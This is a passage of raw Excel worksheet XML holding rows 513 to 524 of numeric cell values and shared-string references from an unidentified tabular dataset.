      <c r="AM513" t="s">
        <v>4152</v>
      </c>
      <c r="AN513" t="s">
        <v>55</v>
      </c>
      <c r="AO513">
        <v>2018</v>
      </c>
      <c r="AP513">
        <v>82395168115</v>
      </c>
      <c r="AQ513" t="s">
        <v>4153</v>
      </c>
      <c r="AR513" t="s">
        <v>4154</v>
      </c>
      <c r="AS513" t="s">
        <v>71</v>
      </c>
      <c r="AT513" t="s">
        <v>58</v>
      </c>
      <c r="AU513">
        <v>25</v>
      </c>
      <c r="AV513">
        <v>0</v>
      </c>
      <c r="AW513">
        <v>0</v>
      </c>
      <c r="AX513">
        <v>0</v>
      </c>
      <c r="AY513">
        <v>4</v>
      </c>
      <c r="AZ513">
        <v>7</v>
      </c>
      <c r="BA513" t="s">
        <v>16890</v>
      </c>
      <c r="BB513" t="s">
        <v>15276</v>
      </c>
      <c r="BC513" t="s">
        <v>9693</v>
      </c>
      <c r="BD513" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="514" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A514">
        <v>1465</v>
      </c>
      <c r="B514" t="s">
        <v>4155</v>
      </c>
      <c r="C514" t="s">
        <v>168</v>
      </c>
      <c r="D514" t="s">
        <v>4156</v>
      </c>
      <c r="E514" t="s">
        <v>4157</v>
      </c>
      <c r="F514" t="s">
        <v>4158</v>
      </c>
      <c r="G514" s="1">
        <v>44242</v>
      </c>
      <c r="H514">
        <v>8416</v>
      </c>
      <c r="I514">
        <v>8416</v>
      </c>
      <c r="J514">
        <v>0</v>
      </c>
      <c r="K514">
        <v>0</v>
      </c>
      <c r="L514">
        <v>0</v>
      </c>
      <c r="M514">
        <v>0</v>
      </c>
      <c r="N514">
        <v>0</v>
      </c>
      <c r="O514">
        <v>0</v>
      </c>
      <c r="P514">
        <v>0</v>
      </c>
      <c r="Q514">
        <v>0</v>
      </c>
      <c r="R514">
        <v>0</v>
      </c>
      <c r="S514">
        <v>0</v>
      </c>
      <c r="T514">
        <v>2</v>
      </c>
      <c r="U514">
        <v>0</v>
      </c>
      <c r="V514">
        <v>0</v>
      </c>
      <c r="W514">
        <v>0</v>
      </c>
      <c r="X514">
        <v>0</v>
      </c>
      <c r="Y514">
        <v>0</v>
      </c>
      <c r="Z514">
        <v>0</v>
      </c>
      <c r="AA514">
        <v>0</v>
      </c>
      <c r="AB514">
        <v>0</v>
      </c>
      <c r="AC514">
        <v>0</v>
      </c>
      <c r="AD514">
        <v>0</v>
      </c>
      <c r="AE514">
        <v>200000</v>
      </c>
      <c r="AF514" t="s">
        <v>4159</v>
      </c>
      <c r="AG514">
        <v>45511</v>
      </c>
      <c r="AH514">
        <v>13</v>
      </c>
      <c r="AJ514">
        <v>168</v>
      </c>
      <c r="AK514" t="s">
        <v>4160</v>
      </c>
      <c r="AL514" t="s">
        <v>4161</v>
      </c>
      <c r="AM514" t="s">
        <v>4162</v>
      </c>
      <c r="AN514" t="s">
        <v>82</v>
      </c>
      <c r="AO514">
        <v>2015</v>
      </c>
      <c r="AP514" t="s">
        <v>4163</v>
      </c>
      <c r="AQ514" t="s">
        <v>4164</v>
      </c>
      <c r="AR514" t="s">
        <v>4159</v>
      </c>
      <c r="AS514" t="s">
        <v>71</v>
      </c>
      <c r="AT514" t="s">
        <v>86</v>
      </c>
      <c r="AU514">
        <v>25</v>
      </c>
      <c r="AV514">
        <v>2</v>
      </c>
      <c r="AW514">
        <v>0</v>
      </c>
      <c r="AX514">
        <v>0</v>
      </c>
      <c r="AY514">
        <v>64</v>
      </c>
      <c r="AZ514">
        <v>1</v>
      </c>
      <c r="BA514" t="s">
        <v>16905</v>
      </c>
      <c r="BB514" t="s">
        <v>15297</v>
      </c>
      <c r="BC514" t="s">
        <v>11131</v>
      </c>
      <c r="BD514" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="515" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A515">
        <v>976</v>
      </c>
      <c r="B515" t="s">
        <v>4165</v>
      </c>
      <c r="C515" t="s">
        <v>477</v>
      </c>
      <c r="D515" t="s">
        <v>4166</v>
      </c>
      <c r="E515" t="s">
        <v>142</v>
      </c>
      <c r="F515" t="s">
        <v>666</v>
      </c>
      <c r="G515" s="1">
        <v>44224</v>
      </c>
      <c r="H515">
        <v>8447</v>
      </c>
      <c r="I515">
        <v>8447</v>
      </c>
      <c r="J515">
        <v>2</v>
      </c>
      <c r="K515">
        <v>0</v>
      </c>
      <c r="L515">
        <v>13</v>
      </c>
      <c r="M515">
        <v>0</v>
      </c>
      <c r="N515">
        <v>0</v>
      </c>
      <c r="O515">
        <v>0</v>
      </c>
      <c r="P515">
        <v>0</v>
      </c>
      <c r="Q515">
        <v>0</v>
      </c>
      <c r="R515">
        <v>0</v>
      </c>
      <c r="S515">
        <v>0</v>
      </c>
      <c r="T515">
        <v>2</v>
      </c>
      <c r="U515">
        <v>125000</v>
      </c>
      <c r="V515">
        <v>0</v>
      </c>
      <c r="W515">
        <v>65000</v>
      </c>
      <c r="X515">
        <v>0</v>
      </c>
      <c r="Y515">
        <v>0</v>
      </c>
      <c r="Z515">
        <v>0</v>
      </c>
      <c r="AA515">
        <v>0</v>
      </c>
      <c r="AB515">
        <v>0</v>
      </c>
      <c r="AC515">
        <v>0</v>
      </c>
      <c r="AD515">
        <v>0</v>
      </c>
      <c r="AE515">
        <v>10000</v>
      </c>
      <c r="AF515" t="s">
        <v>4167</v>
      </c>
      <c r="AG515">
        <v>95542</v>
      </c>
      <c r="AH515">
        <v>29</v>
      </c>
      <c r="AJ515">
        <v>383</v>
      </c>
      <c r="AK515" t="s">
        <v>1963</v>
      </c>
      <c r="AL515" t="s">
        <v>1964</v>
      </c>
      <c r="AM515" t="s">
        <v>4168</v>
      </c>
      <c r="AN515" t="s">
        <v>55</v>
      </c>
      <c r="AO515">
        <v>2000</v>
      </c>
      <c r="AP515" t="s">
        <v>4169</v>
      </c>
      <c r="AQ515" t="s">
        <v>4170</v>
      </c>
      <c r="AR515" t="s">
        <v>4171</v>
      </c>
      <c r="AS515" t="s">
        <v>179</v>
      </c>
      <c r="AT515" t="s">
        <v>58</v>
      </c>
      <c r="AU515">
        <v>26</v>
      </c>
      <c r="AV515">
        <v>1</v>
      </c>
      <c r="AW515">
        <v>30</v>
      </c>
      <c r="AX515">
        <v>20</v>
      </c>
      <c r="AY515">
        <v>8</v>
      </c>
      <c r="AZ515">
        <v>3</v>
      </c>
      <c r="BA515">
        <v>0</v>
      </c>
      <c r="BB515" t="s">
        <v>14975</v>
      </c>
      <c r="BC515" t="s">
        <v>9550</v>
      </c>
      <c r="BD515">
        <v>0</v>
      </c>
    </row>
    <row r="516" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A516">
        <v>1406</v>
      </c>
      <c r="B516" t="s">
        <v>4172</v>
      </c>
      <c r="C516" t="s">
        <v>74</v>
      </c>
      <c r="D516" t="s">
        <v>4173</v>
      </c>
      <c r="E516" t="s">
        <v>49</v>
      </c>
      <c r="F516" t="s">
        <v>3673</v>
      </c>
      <c r="G516" s="1">
        <v>44267</v>
      </c>
      <c r="H516">
        <v>8509</v>
      </c>
      <c r="I516">
        <v>8509</v>
      </c>
      <c r="J516">
        <v>0</v>
      </c>
      <c r="K516">
        <v>3</v>
      </c>
      <c r="L516">
        <v>0</v>
      </c>
      <c r="M516">
        <v>0</v>
      </c>
      <c r="N516">
        <v>0</v>
      </c>
      <c r="O516">
        <v>0</v>
      </c>
      <c r="P516">
        <v>0</v>
      </c>
      <c r="Q516">
        <v>0</v>
      </c>
      <c r="R516">
        <v>0</v>
      </c>
      <c r="S516">
        <v>0</v>
      </c>
      <c r="T516">
        <v>1</v>
      </c>
      <c r="U516">
        <v>0</v>
      </c>
      <c r="V516">
        <v>4500</v>
      </c>
      <c r="W516">
        <v>0</v>
      </c>
      <c r="X516">
        <v>0</v>
      </c>
      <c r="Y516">
        <v>0</v>
      </c>
      <c r="Z516">
        <v>0</v>
      </c>
      <c r="AA516">
        <v>0</v>
      </c>
      <c r="AB516">
        <v>0</v>
      </c>
      <c r="AC516">
        <v>0</v>
      </c>
      <c r="AD516">
        <v>0</v>
      </c>
      <c r="AE516">
        <v>35600</v>
      </c>
      <c r="AF516" t="s">
        <v>4174</v>
      </c>
      <c r="AG516">
        <v>50189</v>
      </c>
      <c r="AH516">
        <v>14</v>
      </c>
      <c r="AJ516">
        <v>220</v>
      </c>
      <c r="AK516" t="s">
        <v>3842</v>
      </c>
      <c r="AL516" t="s">
        <v>4175</v>
      </c>
      <c r="AM516" t="s">
        <v>4176</v>
      </c>
      <c r="AN516" t="s">
        <v>55</v>
      </c>
      <c r="AO516">
        <v>1995</v>
      </c>
      <c r="AP516" t="s">
        <v>4177</v>
      </c>
      <c r="AQ516" t="s">
        <v>4178</v>
      </c>
      <c r="AR516" t="s">
        <v>4179</v>
      </c>
      <c r="AS516" t="s">
        <v>71</v>
      </c>
      <c r="AT516" t="s">
        <v>58</v>
      </c>
      <c r="AU516">
        <v>25</v>
      </c>
      <c r="AV516">
        <v>2</v>
      </c>
      <c r="AW516">
        <v>5</v>
      </c>
      <c r="AX516">
        <v>5</v>
      </c>
      <c r="AY516">
        <v>16</v>
      </c>
      <c r="AZ516">
        <v>21</v>
      </c>
      <c r="BA516" t="s">
        <v>16877</v>
      </c>
      <c r="BB516" t="s">
        <v>15255</v>
      </c>
      <c r="BC516" t="s">
        <v>10442</v>
      </c>
      <c r="BD516" t="s">
        <v>9752</v>
      </c>
    </row>
    <row r="517" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A517">
        <v>1508</v>
      </c>
      <c r="B517" t="s">
        <v>4180</v>
      </c>
      <c r="C517" t="s">
        <v>157</v>
      </c>
      <c r="D517" t="s">
        <v>4181</v>
      </c>
      <c r="E517" t="s">
        <v>363</v>
      </c>
      <c r="F517" t="s">
        <v>364</v>
      </c>
      <c r="G517" s="1">
        <v>44238</v>
      </c>
      <c r="H517">
        <v>8514</v>
      </c>
      <c r="I517">
        <v>8514</v>
      </c>
      <c r="J517">
        <v>0</v>
      </c>
      <c r="K517">
        <v>0</v>
      </c>
      <c r="L517">
        <v>0</v>
      </c>
      <c r="M517">
        <v>0</v>
      </c>
      <c r="N517">
        <v>0</v>
      </c>
      <c r="O517">
        <v>0</v>
      </c>
      <c r="P517">
        <v>0</v>
      </c>
      <c r="Q517">
        <v>0</v>
      </c>
      <c r="R517">
        <v>0</v>
      </c>
      <c r="S517">
        <v>0</v>
      </c>
      <c r="T517">
        <v>1</v>
      </c>
      <c r="U517">
        <v>0</v>
      </c>
      <c r="V517">
        <v>0</v>
      </c>
      <c r="W517">
        <v>0</v>
      </c>
      <c r="X517">
        <v>0</v>
      </c>
      <c r="Y517">
        <v>0</v>
      </c>
      <c r="Z517">
        <v>0</v>
      </c>
      <c r="AA517">
        <v>0</v>
      </c>
      <c r="AB517">
        <v>0</v>
      </c>
      <c r="AC517">
        <v>0</v>
      </c>
      <c r="AD517">
        <v>0</v>
      </c>
      <c r="AE517">
        <v>100000000</v>
      </c>
      <c r="AF517" t="s">
        <v>4182</v>
      </c>
      <c r="AG517">
        <v>60164</v>
      </c>
      <c r="AH517">
        <v>16</v>
      </c>
      <c r="AJ517">
        <v>264</v>
      </c>
      <c r="AK517" t="s">
        <v>3260</v>
      </c>
      <c r="AL517" t="s">
        <v>3261</v>
      </c>
      <c r="AM517" t="s">
        <v>4183</v>
      </c>
      <c r="AN517" t="s">
        <v>55</v>
      </c>
      <c r="AO517">
        <v>2010</v>
      </c>
      <c r="AP517">
        <v>313292920</v>
      </c>
      <c r="AQ517" t="s">
        <v>4184</v>
      </c>
      <c r="AR517" t="s">
        <v>4182</v>
      </c>
      <c r="AS517" t="s">
        <v>371</v>
      </c>
      <c r="AT517" t="s">
        <v>58</v>
      </c>
      <c r="AU517">
        <v>6</v>
      </c>
      <c r="AV517">
        <v>1</v>
      </c>
      <c r="AW517">
        <v>2</v>
      </c>
      <c r="AX517">
        <v>2</v>
      </c>
      <c r="AY517">
        <v>4</v>
      </c>
      <c r="AZ517">
        <v>4</v>
      </c>
      <c r="BA517" t="s">
        <v>16885</v>
      </c>
      <c r="BB517" t="s">
        <v>15267</v>
      </c>
      <c r="BC517" t="s">
        <v>9522</v>
      </c>
      <c r="BD517" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="518" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A518">
        <v>1157</v>
      </c>
      <c r="B518" t="s">
        <v>4185</v>
      </c>
      <c r="C518" t="s">
        <v>60</v>
      </c>
      <c r="D518" t="s">
        <v>4186</v>
      </c>
      <c r="E518" t="s">
        <v>363</v>
      </c>
      <c r="F518" t="s">
        <v>364</v>
      </c>
      <c r="G518" s="1">
        <v>44350</v>
      </c>
      <c r="H518">
        <v>8549</v>
      </c>
      <c r="I518">
        <v>8549</v>
      </c>
      <c r="J518">
        <v>0</v>
      </c>
      <c r="K518">
        <v>0</v>
      </c>
      <c r="L518">
        <v>0</v>
      </c>
      <c r="M518">
        <v>0</v>
      </c>
      <c r="N518">
        <v>0</v>
      </c>
      <c r="O518">
        <v>0</v>
      </c>
      <c r="P518">
        <v>0</v>
      </c>
      <c r="Q518">
        <v>2</v>
      </c>
      <c r="R518">
        <v>1</v>
      </c>
      <c r="S518">
        <v>0</v>
      </c>
      <c r="T518">
        <v>2</v>
      </c>
      <c r="U518">
        <v>0</v>
      </c>
      <c r="V518">
        <v>0</v>
      </c>
      <c r="W518">
        <v>0</v>
      </c>
      <c r="X518">
        <v>0</v>
      </c>
      <c r="Y518">
        <v>0</v>
      </c>
      <c r="Z518">
        <v>0</v>
      </c>
      <c r="AA518">
        <v>0</v>
      </c>
      <c r="AB518">
        <v>0</v>
      </c>
      <c r="AC518">
        <v>0</v>
      </c>
      <c r="AD518">
        <v>0</v>
      </c>
      <c r="AE518">
        <v>0</v>
      </c>
      <c r="AF518" t="s">
        <v>4187</v>
      </c>
      <c r="AG518">
        <v>35527</v>
      </c>
      <c r="AH518">
        <v>10</v>
      </c>
      <c r="AJ518">
        <v>139</v>
      </c>
      <c r="AK518" t="s">
        <v>4188</v>
      </c>
      <c r="AL518" t="s">
        <v>4189</v>
      </c>
      <c r="AM518" t="s">
        <v>4190</v>
      </c>
      <c r="AN518" t="s">
        <v>55</v>
      </c>
      <c r="AO518">
        <v>1980</v>
      </c>
      <c r="AP518" t="s">
        <v>4191</v>
      </c>
      <c r="AQ518">
        <v>82181043252</v>
      </c>
      <c r="AR518" t="s">
        <v>4187</v>
      </c>
      <c r="AS518" t="s">
        <v>371</v>
      </c>
      <c r="AT518" t="s">
        <v>58</v>
      </c>
      <c r="AU518">
        <v>6</v>
      </c>
      <c r="AV518">
        <v>0</v>
      </c>
      <c r="AW518">
        <v>2</v>
      </c>
      <c r="AX518">
        <v>0</v>
      </c>
      <c r="AY518">
        <v>7</v>
      </c>
      <c r="AZ518">
        <v>5</v>
      </c>
      <c r="BA518" t="s">
        <v>17242</v>
      </c>
      <c r="BB518" t="s">
        <v>15889</v>
      </c>
      <c r="BC518" t="s">
        <v>13207</v>
      </c>
      <c r="BD518" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="519" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A519">
        <v>1571</v>
      </c>
      <c r="B519" t="s">
        <v>4192</v>
      </c>
      <c r="C519" t="s">
        <v>168</v>
      </c>
      <c r="D519" t="s">
        <v>4193</v>
      </c>
      <c r="E519" t="s">
        <v>121</v>
      </c>
      <c r="F519" t="s">
        <v>4194</v>
      </c>
      <c r="G519" s="1">
        <v>44265</v>
      </c>
      <c r="H519">
        <v>8570</v>
      </c>
      <c r="I519">
        <v>8570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t="s">
        <v>4195</v>
      </c>
      <c r="AG519">
        <v>16153</v>
      </c>
      <c r="AH519">
        <v>13</v>
      </c>
      <c r="AJ519">
        <v>179</v>
      </c>
      <c r="AK519" t="s">
        <v>4196</v>
      </c>
      <c r="AL519" t="s">
        <v>4197</v>
      </c>
      <c r="AM519" t="s">
        <v>4198</v>
      </c>
      <c r="AN519" t="s">
        <v>68</v>
      </c>
      <c r="AO519">
        <v>2011</v>
      </c>
      <c r="AP519">
        <v>85210243121</v>
      </c>
      <c r="AQ519" t="s">
        <v>4199</v>
      </c>
      <c r="AR519" t="s">
        <v>4195</v>
      </c>
      <c r="AS519" t="s">
        <v>71</v>
      </c>
      <c r="AT519" t="s">
        <v>72</v>
      </c>
      <c r="AU519">
        <v>26</v>
      </c>
      <c r="AV519">
        <v>0</v>
      </c>
      <c r="AW519">
        <v>0</v>
      </c>
      <c r="AX519">
        <v>0</v>
      </c>
      <c r="AY519">
        <v>1</v>
      </c>
      <c r="AZ519">
        <v>5</v>
      </c>
      <c r="BA519" t="s">
        <v>16940</v>
      </c>
      <c r="BB519" t="s">
        <v>15374</v>
      </c>
      <c r="BC519" t="s">
        <v>13030</v>
      </c>
      <c r="BD519">
        <v>0</v>
      </c>
    </row>
    <row r="520" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A520">
        <v>1249</v>
      </c>
      <c r="B520" t="s">
        <v>4200</v>
      </c>
      <c r="C520" t="s">
        <v>129</v>
      </c>
      <c r="D520" t="s">
        <v>4201</v>
      </c>
      <c r="E520" t="s">
        <v>49</v>
      </c>
      <c r="F520" t="s">
        <v>4202</v>
      </c>
      <c r="G520" s="1">
        <v>44292</v>
      </c>
      <c r="H520">
        <v>8590</v>
      </c>
      <c r="I520">
        <v>8590</v>
      </c>
      <c r="J520">
        <v>0</v>
      </c>
      <c r="K520">
        <v>0</v>
      </c>
      <c r="L520">
        <v>0</v>
      </c>
      <c r="M520">
        <v>0</v>
      </c>
      <c r="N520">
        <v>0</v>
      </c>
      <c r="O520">
        <v>0</v>
      </c>
      <c r="P520">
        <v>0</v>
      </c>
      <c r="Q520">
        <v>3</v>
      </c>
      <c r="R520">
        <v>5</v>
      </c>
      <c r="S520">
        <v>0</v>
      </c>
      <c r="T520">
        <v>1</v>
      </c>
      <c r="U520">
        <v>0</v>
      </c>
      <c r="V520">
        <v>0</v>
      </c>
      <c r="W520">
        <v>0</v>
      </c>
      <c r="X520">
        <v>0</v>
      </c>
      <c r="Y520">
        <v>0</v>
      </c>
      <c r="Z520">
        <v>0</v>
      </c>
      <c r="AA520">
        <v>0</v>
      </c>
      <c r="AB520">
        <v>500</v>
      </c>
      <c r="AC520">
        <v>2000</v>
      </c>
      <c r="AD520">
        <v>0</v>
      </c>
      <c r="AE520">
        <v>1000</v>
      </c>
      <c r="AF520" t="s">
        <v>4203</v>
      </c>
      <c r="AG520">
        <v>15119</v>
      </c>
      <c r="AH520">
        <v>11</v>
      </c>
      <c r="AJ520">
        <v>270</v>
      </c>
      <c r="AK520" t="s">
        <v>4204</v>
      </c>
      <c r="AL520" t="s">
        <v>4205</v>
      </c>
      <c r="AM520" t="s">
        <v>4206</v>
      </c>
      <c r="AN520" t="s">
        <v>55</v>
      </c>
      <c r="AO520">
        <v>2016</v>
      </c>
      <c r="AP520" t="s">
        <v>4207</v>
      </c>
      <c r="AQ520" t="s">
        <v>4208</v>
      </c>
      <c r="AR520" t="s">
        <v>4203</v>
      </c>
      <c r="AS520" t="s">
        <v>57</v>
      </c>
      <c r="AT520" t="s">
        <v>58</v>
      </c>
      <c r="AU520">
        <v>26</v>
      </c>
      <c r="AV520">
        <v>2</v>
      </c>
      <c r="AW520">
        <v>0</v>
      </c>
      <c r="AX520">
        <v>0</v>
      </c>
      <c r="AY520">
        <v>11</v>
      </c>
      <c r="AZ520">
        <v>1</v>
      </c>
      <c r="BA520" t="s">
        <v>16829</v>
      </c>
      <c r="BB520" t="s">
        <v>15151</v>
      </c>
      <c r="BC520">
        <v>0</v>
      </c>
      <c r="BD520" t="s">
        <v>13139</v>
      </c>
    </row>
    <row r="521" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A521">
        <v>1414</v>
      </c>
      <c r="B521" t="s">
        <v>4209</v>
      </c>
      <c r="C521" t="s">
        <v>157</v>
      </c>
      <c r="D521" t="s">
        <v>4210</v>
      </c>
      <c r="E521" t="s">
        <v>363</v>
      </c>
      <c r="F521" t="s">
        <v>364</v>
      </c>
      <c r="G521" s="1">
        <v>44279</v>
      </c>
      <c r="H521">
        <v>8621</v>
      </c>
      <c r="I521">
        <v>8621</v>
      </c>
      <c r="J521">
        <v>0</v>
      </c>
      <c r="K521">
        <v>0</v>
      </c>
      <c r="L521">
        <v>0</v>
      </c>
      <c r="M521">
        <v>0</v>
      </c>
      <c r="N521">
        <v>0</v>
      </c>
      <c r="O521">
        <v>0</v>
      </c>
      <c r="P521">
        <v>0</v>
      </c>
      <c r="Q521">
        <v>0</v>
      </c>
      <c r="R521">
        <v>0</v>
      </c>
      <c r="S521">
        <v>0</v>
      </c>
      <c r="T521">
        <v>1</v>
      </c>
      <c r="U521">
        <v>0</v>
      </c>
      <c r="V521">
        <v>0</v>
      </c>
      <c r="W521">
        <v>0</v>
      </c>
      <c r="X521">
        <v>0</v>
      </c>
      <c r="Y521">
        <v>0</v>
      </c>
      <c r="Z521">
        <v>0</v>
      </c>
      <c r="AA521">
        <v>0</v>
      </c>
      <c r="AB521">
        <v>0</v>
      </c>
      <c r="AC521">
        <v>0</v>
      </c>
      <c r="AD521">
        <v>0</v>
      </c>
      <c r="AE521">
        <v>250000</v>
      </c>
      <c r="AF521" t="s">
        <v>4211</v>
      </c>
      <c r="AG521">
        <v>61256</v>
      </c>
      <c r="AH521">
        <v>16</v>
      </c>
      <c r="AJ521">
        <v>242</v>
      </c>
      <c r="AK521" t="s">
        <v>758</v>
      </c>
      <c r="AL521" t="s">
        <v>4212</v>
      </c>
      <c r="AM521" t="s">
        <v>4213</v>
      </c>
      <c r="AN521" t="s">
        <v>82</v>
      </c>
      <c r="AO521">
        <v>2001</v>
      </c>
      <c r="AP521" t="s">
        <v>4214</v>
      </c>
      <c r="AQ521" t="s">
        <v>4215</v>
      </c>
      <c r="AR521" t="s">
        <v>4216</v>
      </c>
      <c r="AS521" t="s">
        <v>371</v>
      </c>
      <c r="AT521" t="s">
        <v>86</v>
      </c>
      <c r="AU521">
        <v>24</v>
      </c>
      <c r="AV521">
        <v>1</v>
      </c>
      <c r="AW521">
        <v>9</v>
      </c>
      <c r="AX521">
        <v>0</v>
      </c>
      <c r="AY521">
        <v>3</v>
      </c>
      <c r="AZ521">
        <v>3</v>
      </c>
      <c r="BA521" t="s">
        <v>16880</v>
      </c>
      <c r="BB521" t="s">
        <v>15260</v>
      </c>
      <c r="BC521" t="s">
        <v>11160</v>
      </c>
      <c r="BD521" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="522" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A522">
        <v>1198</v>
      </c>
      <c r="B522" t="s">
        <v>4217</v>
      </c>
      <c r="C522" t="s">
        <v>477</v>
      </c>
      <c r="D522" t="s">
        <v>4218</v>
      </c>
      <c r="E522" t="s">
        <v>300</v>
      </c>
      <c r="F522" t="s">
        <v>4219</v>
      </c>
      <c r="G522" s="1">
        <v>44256</v>
      </c>
      <c r="H522">
        <v>8631</v>
      </c>
      <c r="I522">
        <v>8631</v>
      </c>
      <c r="J522">
        <v>2</v>
      </c>
      <c r="K522">
        <v>2</v>
      </c>
      <c r="L522">
        <v>5</v>
      </c>
      <c r="M522">
        <v>0</v>
      </c>
      <c r="N522">
        <v>0</v>
      </c>
      <c r="O522">
        <v>0</v>
      </c>
      <c r="P522">
        <v>0</v>
      </c>
      <c r="Q522">
        <v>0</v>
      </c>
      <c r="R522">
        <v>2</v>
      </c>
      <c r="S522">
        <v>0</v>
      </c>
      <c r="T522">
        <v>0</v>
      </c>
      <c r="U522">
        <v>750000</v>
      </c>
      <c r="V522">
        <v>10</v>
      </c>
      <c r="W522">
        <v>35</v>
      </c>
      <c r="X522">
        <v>0</v>
      </c>
      <c r="Y522">
        <v>0</v>
      </c>
      <c r="Z522">
        <v>0</v>
      </c>
      <c r="AA522">
        <v>0</v>
      </c>
      <c r="AB522">
        <v>0</v>
      </c>
      <c r="AC522">
        <v>10</v>
      </c>
      <c r="AD522">
        <v>0</v>
      </c>
      <c r="AE522">
        <v>0</v>
      </c>
      <c r="AF522" t="s">
        <v>4220</v>
      </c>
      <c r="AG522">
        <v>95000</v>
      </c>
      <c r="AH522">
        <v>29</v>
      </c>
      <c r="AJ522">
        <v>383</v>
      </c>
      <c r="AK522" t="s">
        <v>4221</v>
      </c>
      <c r="AL522" t="s">
        <v>4222</v>
      </c>
      <c r="AM522" t="s">
        <v>4223</v>
      </c>
      <c r="AN522" t="s">
        <v>55</v>
      </c>
      <c r="AO522">
        <v>2018</v>
      </c>
      <c r="AP522" t="s">
        <v>4224</v>
      </c>
      <c r="AQ522" t="s">
        <v>4225</v>
      </c>
      <c r="AR522" t="s">
        <v>4226</v>
      </c>
      <c r="AS522" t="s">
        <v>71</v>
      </c>
      <c r="AT522" t="s">
        <v>58</v>
      </c>
      <c r="AU522">
        <v>25</v>
      </c>
      <c r="AV522">
        <v>1</v>
      </c>
      <c r="AW522">
        <v>0</v>
      </c>
      <c r="AX522">
        <v>0</v>
      </c>
      <c r="AY522">
        <v>27</v>
      </c>
      <c r="AZ522">
        <v>6</v>
      </c>
      <c r="BA522" t="s">
        <v>16818</v>
      </c>
      <c r="BB522" t="s">
        <v>15116</v>
      </c>
      <c r="BC522">
        <v>0</v>
      </c>
      <c r="BD522" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="523" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A523">
        <v>950</v>
      </c>
      <c r="B523" t="s">
        <v>4227</v>
      </c>
      <c r="C523" t="s">
        <v>88</v>
      </c>
      <c r="D523" t="s">
        <v>4228</v>
      </c>
      <c r="E523" t="s">
        <v>111</v>
      </c>
      <c r="F523" t="s">
        <v>4229</v>
      </c>
      <c r="G523" s="1">
        <v>44253</v>
      </c>
      <c r="H523">
        <v>8653</v>
      </c>
      <c r="I523">
        <v>8653</v>
      </c>
      <c r="J523">
        <v>6</v>
      </c>
      <c r="K523">
        <v>2</v>
      </c>
      <c r="L523">
        <v>4</v>
      </c>
      <c r="M523">
        <v>0</v>
      </c>
      <c r="N523">
        <v>0</v>
      </c>
      <c r="O523">
        <v>1</v>
      </c>
      <c r="P523">
        <v>0</v>
      </c>
      <c r="Q523">
        <v>20</v>
      </c>
      <c r="R523">
        <v>5</v>
      </c>
      <c r="S523">
        <v>1</v>
      </c>
      <c r="T523">
        <v>1</v>
      </c>
      <c r="U523">
        <v>125000</v>
      </c>
      <c r="V523">
        <v>2</v>
      </c>
      <c r="W523">
        <v>30000</v>
      </c>
      <c r="X523">
        <v>0</v>
      </c>
      <c r="Y523">
        <v>0</v>
      </c>
      <c r="Z523">
        <v>0</v>
      </c>
      <c r="AA523">
        <v>0</v>
      </c>
      <c r="AB523">
        <v>10000</v>
      </c>
      <c r="AC523">
        <v>10000</v>
      </c>
      <c r="AD523">
        <v>1</v>
      </c>
      <c r="AE523">
        <v>70000</v>
      </c>
      <c r="AF523" t="s">
        <v>2624</v>
      </c>
      <c r="AG523">
        <v>80222</v>
      </c>
      <c r="AH523">
        <v>17</v>
      </c>
      <c r="AJ523">
        <v>282</v>
      </c>
      <c r="AK523" t="s">
        <v>592</v>
      </c>
      <c r="AL523" t="s">
        <v>602</v>
      </c>
      <c r="AM523" t="s">
        <v>4230</v>
      </c>
      <c r="AN523" t="s">
        <v>55</v>
      </c>
      <c r="AO523">
        <v>1998</v>
      </c>
      <c r="AP523" t="s">
        <v>4231</v>
      </c>
      <c r="AQ523" t="s">
        <v>4232</v>
      </c>
      <c r="AR523" t="s">
        <v>4233</v>
      </c>
      <c r="AS523" t="s">
        <v>71</v>
      </c>
      <c r="AT523" t="s">
        <v>58</v>
      </c>
      <c r="AU523">
        <v>6</v>
      </c>
      <c r="AV523">
        <v>1</v>
      </c>
      <c r="AW523">
        <v>0</v>
      </c>
      <c r="AX523">
        <v>0</v>
      </c>
      <c r="AY523">
        <v>73</v>
      </c>
      <c r="AZ523">
        <v>55</v>
      </c>
      <c r="BA523" t="s">
        <v>16781</v>
      </c>
      <c r="BB523" t="s">
        <v>14959</v>
      </c>
      <c r="BC523">
        <v>0</v>
      </c>
      <c r="BD523" t="s">
        <v>13166</v>
      </c>
    </row>
    <row r="524" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A524">
        <v>1417</v>
      </c>
      <c r="B524" t="s">
        <v>4234</v>
      </c>
      <c r="C524" t="s">
        <v>74</v>
      </c>
      <c r="D524" t="s">
        <v>4235</v>
      </c>
      <c r="E524" t="s">
        <v>142</v>
      </c>
      <c r="F524" t="s">
        <v>143</v>
      </c>
      <c r="G524" s="1">
        <v>44260</v>
      </c>
      <c r="H524">
        <v>8665</v>
      </c>
      <c r="I524">
        <v>8665</v>
      </c>
      <c r="J524">
        <v>5</v>
      </c>
      <c r="K524">
        <v>0</v>
      </c>
      <c r="L524">
        <v>0</v>
      </c>
      <c r="M524">
        <v>0</v>
      </c>
      <c r="N524">
        <v>0</v>
      </c>
      <c r="O524">
        <v>0</v>
      </c>
      <c r="P524">
        <v>0</v>
      </c>
      <c r="Q524">
        <v>0</v>
      </c>
      <c r="R524">
        <v>0</v>
      </c>
      <c r="S524">
        <v>0</v>
      </c>
      <c r="T524">
        <v>1</v>
      </c>
      <c r="U524">
        <v>1300000</v>
      </c>
      <c r="V524">
        <v>0</v>
      </c>
      <c r="W524">
        <v>0</v>
      </c>
      <c r="X524">
        <v>0</v>
      </c>
      <c r="Y524">
        <v>0</v>
      </c>
      <c r="Z524">
        <v>0</v>
      </c>
      <c r="AA524">
        <v>0</v>
      </c>
      <c r="AB524">
        <v>0</v>
      </c>
